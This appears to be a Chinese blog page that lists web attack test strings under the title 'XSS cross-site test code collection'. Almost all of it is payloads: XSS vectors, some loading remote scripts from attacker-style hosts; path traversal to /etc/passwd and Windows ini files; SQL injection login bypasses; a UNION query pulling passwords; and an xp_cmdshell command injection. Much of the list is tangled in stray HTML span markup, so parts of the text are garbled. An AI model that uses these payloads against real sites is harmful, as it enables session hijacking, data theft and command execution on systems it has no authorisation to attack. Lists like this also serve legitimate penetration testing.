- A+
XSS跨站测试代码大全
'><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<script>alert('XSS')</script>
<img src="javascript:alert('XSS')">
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<script>alert('Vulnerable');</script>
<script>alert('Vulnerable')</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert('Vulnerable')</script>
a/
a?<script>alert('Vulnerable')</script>
"><script>alert('Vulnerable')</script>
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'';!--"<XSS>=&{()}
<IMG src="javascript:alert('XSS');">
<IMG src=javascript:alert('XSS')>
<IMG src=JaVaScRiPt:alert('XSS')>
<IMG src=JaVaScRiPt:alert("XSS")>
<IMG src=javascript:alert('XSS')>
<IMG src=javascript:alert('XSS')>
<IMG src=javascript:alert('XSS')>
<IMG src="jav ascript:alert('XSS');">
<IMG src="jav ascript:alert('XSS');">
<IMG src="jav ascript:alert('XSS');">
"<IMG src=java\0script:alert(\"XSS\")>";' > out
<IMG src=" javascript:alert('XSS');">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<BGSOUND src="javascript:alert('XSS');">
<br size="&{alert('XSS')}">
<LAYER src="http://xss.ha.ckers.org/a.js"></layer>
<LINK REL="stylesheet" href="javascript:alert('XSS');">
<IMG src='vbscript:msgbox("XSS")'>
<IMG src="mocha:
"></span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><IMG src="livescript:[code]"></span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"></span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><IFRAME src=javascript:alert('XSS')></IFRAME></span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET></span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><TABLE BACKGROUND="javascript:alert('XSS')"></span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><DIV STYLE="background-image: url(javascript:alert('XSS'))"></span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');"></span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><DIV STYLE="width: expression(alert('XSS'));"></span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE></span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><IMG STYLE='xss:expre\ssion(alert("XSS"))'></span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><STYLE TYPE="text/javascript">alert('XSS');</STYLE></span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A></span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE></span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><BASE href="javascript:alert('XSS');//"></span></p><p><span style="font-size: 14px; font-family: 'times new roman';">getURL("javascript:alert('XSS')")</span></p><p><span style="font-size: 14px; font-family: 'times new roman';">a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);</span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><XML src="javascript:alert('XSS');"></span></p><p><span style="font-size: 14px; font-family: 'times new roman';">"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"</span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT></span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><IMG src="javascript:alert('XSS')"</span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"--></span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"></span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT></span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT></span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT></span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT></span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT></span></p><p><span style="font-size: 14px; font-family: 'times new roman';"><A href=http://www.gohttp://www.google.com/ogle.com/>link</A></span></p><p><span style="font-size: 14px; font-family: 'times new roman';">admin'--</span></p><p><span style="font-size: 14px; font-family: 'times new roman';">' or 0=0 --</span></p><p><span style="font-size: 14px; font-family: 'times new roman';">" or 0=0 --</span></p><p><span style="font-size: 14px; font-family: 'times new roman';">or 0=0 --</span></p><p><span style="font-size: 14px; font-family: 'times new roman';">' or 0=0 #</span></p><p><span style="font-size: 14px; font-family: 'times new roman';">" or 0=0 #</span></p><p><span style="font-size: 14px; font-family: 'times new roman';">or 0=0 #</span></p><p><span style="font-size: 14px; font-family: 'times new roman';">' or 'x'='x</span></p><p><span style="font-size: 14px; font-family: 'times new roman';">" or "x"="x</span></p><p><span style="font-size: 14px; font-family: 'times new roman';">') or ('x'='x</span></p><p><span style="font-size: 14px; font-family: 'times new roman';">' or 1=1--</span></p><p><span style="font-size: 14px; font-family: 'times new roman';">" or 1=1--</span></p><p><span style="font-size: 14px; font-family: 'times new roman';">or 1=1--</span></p><p><span style="font-size: 14px; font-family: 'times new roman';">' or a=a--</span></p><p><span style="font-size: 14px; font-family: 'times new roman';">" or "a"="a</span></p><p><span style="font-size: 14px; font-family: 'times new roman';">') or ('a'='a</span></p><p><span style="font-size: 14px; font-family: 'times new roman';">") or ("a"="a</span></p><p><span style="font-size: 14px; font-family: 'times new roman';">hi" or "a"="a</span></p><p><span style="font-size: 14px; font-family: 'times new roman';">hi" or 1=1 --</span></p><p><span style="font-size: 14px; font-family: 'times new roman';">hi' or 1=1 --</span></p><p><span style="font-size: 14px; font-family: 'times new roman';">hi' or 'a'='a</span></p><p><span style="font-size: 14px; font-family: 'times new roman';">hi') or ('a'='a</span></p><p><span style="font-size: 14px; font-family: 'times new roman';">hi") or ("a"="a
- 我的微信
- 这是我的微信扫一扫
- 我的微信公众号
- 我的微信公众号扫一扫